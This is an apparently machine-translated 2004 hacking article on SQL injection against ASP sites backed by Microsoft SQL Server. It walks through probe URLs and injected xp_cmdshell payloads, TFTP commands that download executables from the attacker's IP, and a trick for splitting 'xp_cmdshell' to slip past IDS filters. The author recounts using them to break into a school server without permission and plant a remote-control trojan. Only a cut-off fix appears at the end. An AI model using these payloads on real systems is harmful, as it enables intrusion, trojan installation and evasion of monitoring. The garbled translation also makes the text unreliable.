Author: angel article in Nature: Original release date: 2004-04-02 Introduction SQL injection can be said to be a loophole, it can be said to be an attack method, program variables handled properly, the data submitted by the user filter inadequate This vulnerability may be generated, and the attack principle is to use the user to submit or modify data, insert the desired SQL statement into the system actual SQL statement, and the sensitive information is low, and the control server is controlled. SQL INJECTION is not tightly confined in the MSSQL database, Access, MySQL, Oracle, Sybase can perform SQL INJECTION attacks. ISNO's "SQL Injection Attack Technology" is an unpleasant good article, everyone can look, but the program is all kinds, some can submit commands or statements by modifying the URL data, some can't do, can not What should I do with the idea of playing a URL? By modifying the value of the value within the tag, you can submit our structure, SQL Injection is a very flexible technology, but our purpose is only one, that is, it is the effectiveness of the detection and processing of procedures or IDS. Scriptures. Detecting vulnerabilities in most ASP sites, we don't know their program code, and it is impossible to discover SQL Injection vulnerabilities by any scanner. At this time, it will be detected by manual, because we execute SQL statements to use single quotes, points No., comma, colon, and "-", so we add these symbols after the modified URL, or add these symbols in the text box in the form, such as:
http://localhost/show.asp? id = 1 'http://localhost/show.asp? id = 1; ...... The information returned by the page, determines if there is SQL Injection vulnerability, but the simplest passed character filtering To determine, depending on the IIS configuration, the returned information is not, sometimes displayed:
Microsoft OLE DB Provider for ODBC DRIVERS Error '80040E21' The ODBC driver does not support the desired properties. /REGISTER/LOSTPASS2.ASP, the line 15 may sometimes display the "HTTP 500 - internal server error", or the original page may also be displayed normally, it is more likely to prompt "HTTP 404 - Can't find this page", judgment Whether there is a vulnerability, there is a basic basis-experience. When I first started learning, I thought that our school didn't have this vulnerability, but the little jingle told me that the return information is just a basis, more important is the experience, and we have experience. The school has been taken with SQL INJECTION vulnerability in 2 hours, and also has a Telnet service ... If you can get the source code, you can find the problem of the ASP file by analyzing the source code, but this requirement Higher programming foundation, recently pskey discovered that there were many programs existing SQL INJECTION vulnerabilities. It's a powerful role. Submitted Data We judge that an ASP program has a SQL INJECTION vulnerability to construct our statement to operate on the server, usually our purpose is to control the SQL server to access the information or even an operating system. So we want to use XP_cmdshell this extended stored procedure, XP_cmdshell is a very useful extension stored procedure for executing system commands, such as DIR, we can submit different statements depending on the program, the following example statement is just a reference, tell Everyone is the principle, the actual situation is determined, and it is not necessarily successful, the same. http://localhost/show.asp? id = 1; exec master.dbo.xp_cmdshell 'dir'; - http://localhost/show.asp? id = 1 '; exec master..xp_cmdshell' Dir'- - As mentioned earlier, submit such an information browser will return an error message or 500 errors, how can we know if the execution is successful? ISNO's way is to listen to the native port with NC, then submit the nslookup command to query, I personally feel a little trouble, use the TFTP to have a variety of benefits, can know if the command is successful; I can get the IP of the SQL server to determine the SQL server The location; saves some steps directly upload files to SQL servers. Use the XP_cmdshell extension stored procedure to execute the TFTP command, when you play the Unicode vulnerability, you will be pure. Columns such as:
http://localhost/show.asp? id = 1; exec master.dbo.xp_cmdshell 'tftp -i youip get file.exe'; - http://localhost/show.asp? id = 1 '; Exec Master .. xp_cmdshell 'tftp -i youip get file.exe' - The data sometimes submitted does not necessarily work, see how you have wrapped the program's detection, if lucky successfully, you can see the window of the TFTP software appears from this The information downloaded by the machine. The IP address in the dialog is the IP of the SQL server. If the IP is determined where the SQL server is in, with the web server, in the local area network, or a separate server, it is judged that this knowledge point is not in this article. This is slightly. After the command executes success, you can replace the content in single quotation marks, add users, and improve the permissions, but to see what is the group of this role to connect the SQL server. Most of the programs / IDs are not as smooth as we imagined, clear character filtration is not perfect, but the program or IDS detects that the user submits an extension stored procedure or system command, automatically converts or splits characters, let What is the data homer or change we submitted, what should I do? I remember that I think about how to spare my IDS detection, spend two lessons, and still write paintings to waste half of the notebook, and have a small tip, give a thinking: split command string , Assign a value to the variable, then combine the variable, so it will not be homed, and two examples are given below:
Declare @a sysname set @ a = 'xp _' 'cmdshell' exec @A 'DIR C: /' DECLARE @A sysname set @ a = 'xp' '_ cm' 'dshell' exec @a 'DIR C: / 'Sometimes don't need this, just change some characters to the ASCII code, you can also successfully execute, this I have no conditional test, if a high person has this research, please enlighten me. The site of our school is doing well. Last "The Status of the School Campus Network" is published, and the school's security is a little increase, the monitoring procedure is close to the metamorphosis, why do you say this? Added dozens of daemon, can't crash, blue screen, but I broke, including the most proud hard drive protection card. (Someone wants me to take my own school? Because as a security technology enthusiasts, even how do you make your school / company? And you can indirectly remind the administrator because our school administrator's security Not very careful), it is not absolute, of course, it is impossible to be perfect, although any vulnerabilities can be found with the scanner, but use the SQL Injection vulnerability to easily break, look at the entire site, there is no URL parameter, the article is static Page, there is only one registration system and mobile network forum, the mobile network forum is SQL version, it has been modified, so it is more secure, the latest vulnerability is not. Due to the conditions of the school, the whole station is based on ASP SQL, and uses the SQL Injection vulnerability to lay the foundation. The registration system has a forgotten password function. The file is lostpass.asp, submit it to Lostpass1.asp, submit single quotes and Both the semicolon prompts the error, it seems that there is no filtering, so I submitted the following command: exec master.dbo.xp_cmdshell 'tftp -i youip get file.exe'; - Exec master..xp_cmdshell 'TFTP -I Youip Get File .exe '- xp_cmdshell' tftp -i youip get file.exe '; - ... implemented N instructions (n> 50), don't see it, forget it, give up, then look at what files can Utilization, soon I found Shownews.asp file, usually execute the system commands, such display articles, information, etc. I want the school's security awareness should not be so strong, so I have been happy, immediately Try:
http://ourschool/shownews.asp? newsid = 1; http://ourschool/shownews.asp? newsid = 1 'Oh, return "HTTP 500 - internal server error" exists with experience vulnerability, OK, immediately enter:
Http://ourschool/shownews.asp? newsid = 1'Exec master..xp_cmdshell 'tftp -i myip get flash.exe'; - http: //ourschool/shownews.asp? newsid = 1; Exec Master .. XP_cmdshell 'tftp -i myip get flash.exe; - ... http://ourschool/shownews.asp? newsid = 1; exec master.dbo.xp_cmdshell' tftp -i myip get flash.exe '; - trial At this time, I finally found that the window of the TFTP software has a prompt. You can refer to the screenshots in front, we have succeeded, my experience tells me that the role to connect the SQL database is the sysadmin group, because our school is independent Server, so permission should be high, we can perform any command, just replace http: //ourschool/shownews.asp? Newsid = 1; exec master.dbo.xp_cmdshell 'tftp -i myip get flash.exe'; In order to end the battle, I will pass a gray pigeon. The flash.exe just passed is the client :) Afterwards, the connection database is really sa, after the work is not written Anyway, everyone knows. The whole process looks very simple, it is possible to implement some statements. In fact, when I submit data, I have never seen the code of Shownews.asp (later I saw), I submitted a statement that didn't have 20 invalidations. Less bending, but the masters of SQL Injection are some fans, this article is only a guiding role. After the solution, I analyzed (Thank you pskey guidance) shownews.asp, found that this file did not do any filter, there is such a sentence: rs.open "Select * from news where news =" & cstr (Request ("NewsID) ")), CONN, 1, 1 can directly construct a NewsID to launch a SQL INJECTION attack, a solution to this file is to filter with the Replace function, see one of the following functions:
